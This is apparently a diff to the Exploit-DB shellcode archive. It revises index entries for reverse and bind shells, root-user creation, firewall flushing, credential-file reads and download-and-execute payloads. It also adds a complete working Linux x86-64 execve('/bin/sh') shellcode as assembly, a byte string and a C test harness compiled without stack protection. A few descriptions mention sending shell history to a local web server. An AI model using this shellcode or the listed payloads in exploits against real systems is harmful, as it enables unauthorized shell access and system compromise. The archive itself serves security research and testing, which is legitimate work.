 44811,shellcodes/arm/44811.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (32 bytes)",2018-05-31,"Ken Kitahara",shellcode,arm
-46491,shellcodes/linux_x86/46491.c,"Linux/x86 - iptables -F Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
+46491,shellcodes/linux_x86/46491.c,"Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes)",2019-03-04,"Cameron Brown",shellcode,linux_x86
 44856,shellcodes/arm/44856.c,"Linux/ARM - Egghunter (0x50905090) + execve('/bin/sh') Shellcode (60 bytes)",2018-06-08,rtmcx,shellcode,arm
 44963,shellcodes/linux_x86/44963.c,"Linux/x86 - Execve /bin/cat /etc/passwd Shellcode (37 bytes)",2018-07-02,"Anurag Srivastava",shellcode,linux_x86
 44990,shellcodes/linux_x86/44990.c,"Linux/x86 - Kill Process Shellcode (20 bytes)",2018-07-09,"Nathu Nandwani",shellcode,linux_x86
@@ -901,13 +901,13 @@ id,file,description,date,author,type,platform
 45039,shellcodes/linux_x86-64/45039.c,"Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)",2018-07-17,"Hashim Jawad",shellcode,linux_x86-64
 45080,shellcodes/linux_x86/45080.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (100 bytes)",2018-07-23,"Kartik Durg",shellcode,linux_x86
 45119,shellcodes/arm/45119.c,"Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)",2018-08-01,"Ken Kitahara",shellcode,arm
-45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
+45139,shellcodes/linux_x86/45139.c,"Linux/x86 - Reverse (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)",2018-08-03,"Kartik Durg",shellcode,linux_x86
 45144,shellcodes/arm/45144.c,"Linux/ARM - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (128 Bytes)",2018-08-03,"Ken Kitahara",shellcode,arm
 45185,shellcodes/linux_x86-64/45185.asm,"Linux/x64 - Add Root User (toor/toor) Shellcode (99 bytes)",2018-08-13,epi,shellcode,linux_x86-64
 45287,shellcodes/linux_mips/45287.c,"Linux/MIPS64 - execve(/bin/sh) Shellcode (48 bytes)",2018-08-29,antonio,shellcode,linux_mips
 45290,shellcodes/arm/45290.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (32 Bytes)",2018-08-29,"Ken Kitahara",shellcode,arm
 45291,shellcodes/linux_x86/45291.c,"Linux/x86 - Bind (1337/TCP) Shell (/bin/sh) + (Dual IPv4 and IPv6) Shellcode (146 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
-45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse TCP (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
+45292,shellcodes/linux_x86/45292.py,"Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes)",2018-08-29,"Kevin Kirsche",shellcode,linux_x86
 45293,shellcodes/windows_x86-64/45293.c,"Windows/x64 (10) - WoW64 Egghunter (w00tw00t) Shellcode (50 bytes)",2018-08-29,n30m1nd,shellcode,windows_x86-64
 45308,shellcodes/arm/45308.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-08-30,"Ken Kitahara",shellcode,arm
 45329,shellcodes/arm/45329.c,"Linux/ARM - read(0_ buf_ 0xff) stager + execve(_/bin/sh__ NULL_ NULL) Shellcode (20 Bytes)",2018-09-04,"Ken Kitahara",shellcode,arm
@@ -922,7 +922,7 @@ id,file,description,date,author,type,platform
 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
 45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm
 45538,shellcodes/linux_x86/45538.txt,"Linux/x86 - execve(/bin/sh) + MMX/ROT13/XOR Shellcode (Encoder/Decoder) (104 bytes)",2018-10-08,"Kartik Durg",shellcode,linux_x86
-45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
+45541,shellcodes/linux_mips/45541.c,"Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes)",2018-10-08,cq674350529,shellcode,linux_mips
 45669,shellcodes/linux_x86/45669.c,"Linux/x86 - execve(/bin/cat /etc/ssh/sshd_config) Shellcode 44 Bytes",2018-10-24,"Goutham Madhwaraj",shellcode,linux_x86
 45743,shellcodes/windows_x86-64/45743.c,"Windows/x64 - Remote (Bind TCP) Keylogger Shellcode (864 bytes) (Generator)",2018-10-30,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
 45821,shellcodes/linux_x86/45821.c,"Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)",2018-11-13,"Javier Tello",shellcode,linux_x86
@@ -931,7 +931,7 @@ id,file,description,date,author,type,platform
 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86
 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64
 46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux
-46103,shellcodes/linux_x86/46103.c,"Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
+46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86
 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator
 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86
 46275,shellcodes/linux_x86/46275.c,"Linux/x86 - execve() - Terminal Calculator (bc) Shellcode (53 bytes)",2019-01-29,"Daniele Votta",shellcode,linux_x86
@@ -943,26 +943,27 @@ id,file,description,date,author,type,platform
 46277,shellcodes/linux_x86/46277.c,"Linux/x86 - execve(/bin/sh) + RShift-1 Encoded Shellcode (29 bytes)",2019-01-29,"Joao Batista",shellcode,linux_x86
 46302,shellcodes/linux_x86/46302.c,"Linux/x86 - Read /etc/passwd Shellcode (58 Bytes) (3)",2019-02-01,Kiewicz,shellcode,linux_x86
 46323,shellcodes/linux_x86/46323.py,"Linux/x86 - Random Insertion Encoder and Decoder Shellcode (Generator)",2019-02-05,"Aditya Chaudhary",shellcode,linux_x86
-46393,shellcodes/macos/46393.c,"macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46394,shellcodes/macos/46394.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46395,shellcodes/macos/46395.c,"macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46396,shellcodes/macos/46396.c,"macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
-46397,shellcodes/macos/46397.c,"macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46394,shellcodes/macos/46394.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46396,shellcodes/macos/46396.c,"Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
+46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",shellcode,macos
 46499,shellcodes/linux_x86/46499.c,"Linux/x86 - XOR Encoder / Decoder execve(/bin/sh) Shellcode (45 bytes)",2019-03-05,"Daniele Votta",shellcode,linux_x86
 46519,shellcodes/linux_x86/46519.c,"Linux/x86 - INSERTION Encoder / Decoder execve(/bin/sh) Shellcode (88 bytes)",2019-03-08,"Daniele Votta",shellcode,linux_x86
 46523,shellcodes/linux_x86/46523.py,"Linux/x86 - MMX-XOR Encoder / Decoder execve(/bin/sh) Shellcode (44 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
-46524,shellcodes/linux_x86/46524.c,"Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
+46524,shellcodes/linux_x86/46524.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes)",2019-03-11,"Daniele Votta",shellcode,linux_x86
 46679,shellcodes/generator/46679.nasm,"Linux/x64 - XANAX Encoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
 46680,shellcodes/generator/46680.nasm,"Linux/x64 - XANAX Decoder Shellcode (127 bytes)",2019-04-09,"Alan Vivona",shellcode,generator
-46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
+46689,shellcodes/linux_x86/46689.c,"Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes)",2019-04-12,strider,shellcode,linux_x86
 46696,shellcodes/generator/46696.py,"Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes)",2019-04-15,"Petr Javorik",shellcode,generator
-46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
-46736,shellcodes/arm/46736.txt,"Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
-46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Shellcode Crypter (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
-46789,shellcodes/linux_x86/46789.txt,"Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper",2019-05-03,"Dave Sully",shellcode,linux_x86
-46791,shellcodes/linux_x86/46791.c,"Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
+46704,shellcodes/linux_x86/46704.txt,"Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes)",2019-04-15,strider,shellcode,linux_x86
+46736,shellcodes/arm/46736.txt,"Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) + Null-Free Shellcode (100 bytes)",2019-04-22,"Alan Vivona",shellcode,arm
+46746,shellcodes/generator/46746.txt,"Linux/x86 - Rabbit Encoder Shellcode  (200 bytes)",2019-04-24,"Petr Javorik",shellcode,generator
+46789,shellcodes/generator/46789.txt,"Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes)",2019-05-03,"Dave Sully",shellcode,generator
+46791,shellcodes/linux_x86/46791.c,"Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes)",2019-05-03,strider,shellcode,linux_x86
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
-46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
-46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
-46829,shellcodes/linux_x86/46829.c,"Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
-46870,shellcodes/linux_x86-64/46870.c,"Linux x86_64 - Delete File Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
+46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - Shred file (test.txt) Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
+46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve(/bin/sh) Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
+46829,shellcodes/linux_x86/46829.c,"Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
+46870,shellcodes/linux_x86-64/46870.c,"Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes)",2019-05-20,"Aron Mihaljevic",shellcode,linux_x86-64
+46907,shellcodes/linux_x86-64/46907.c,"Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)",2019-05-23,Rajvardhan,shellcode,linux_x86-64

shellcodes/linux_x86-64/46907.c

@@ -0,0 +1,74 @@
+/*
+;Category: Shellcode
+;Title: GNU/Linux x86_64 - execve /bin/sh
+;Author: rajvardhan
+;Date: 23/05/2019
+;Architecture: Linux x86_64
+;Possibly The Smallest And Fully Reliable Shellcode
+
+===========
+Asm Source  
+===========
+
+global _start
+section .text
+_start:
+	xor rsi,rsi
+	push rsi
+	mov rdi,0x68732f2f6e69622f
+	push rdi
+	push rsp
+	pop rdi
+	push 59
+	pop rax
+	cdq
+	syscall
+================================
+Instruction for nasm compliation
+================================
+
+nasm -f elf64 shellcode.asm -o shellcode.o
+ld shellcode.o -o shellcode
+
+===================
+objdump disassembly
+===================
+
+Disassembly of section .text:
+
+0000000000401000 <_start>:
+  401000:	48 31 f6             	xor    %rsi,%rsi
+  401003:	56                   	push   %rsi
+  401004:	48 bf 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rdi
+  40100b:	2f 73 68 
+  40100e:	57                   	push   %rdi
+  40100f:	54                   	push   %rsp
+  401010:	5f                   	pop    %rdi
+  401011:	6a 3b                	pushq  $0x3b
+  401013:	58                   	pop    %rax
+  401014:	99                   	cltd   
+  401015:	0f 05                	syscall 
+
+==================
+23 Bytes Shellcode
+==================
+
+\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
+
+======================
+C Compilation And Test
+======================
+
+gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
+
+*/
+
+#include <stdio.h>
+
+unsigned char shellcode[] = \
+"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
+int main()
+{
+    int (*ret)() = (int(*)())shellcode;
+    ret();
+}

shellcodes/linux_x86/46704.txt

@@ -9,11 +9,7 @@
 # Shellcode Length: 125
 ------------------------------[Description]---------------------------------
 
-This shellcode writes a new user to the given passwd file
 
-Username = sshd
-password = root
-Shell = sh
 
 -----------------------------[Shellcode Dump]---------------------------------
 section .text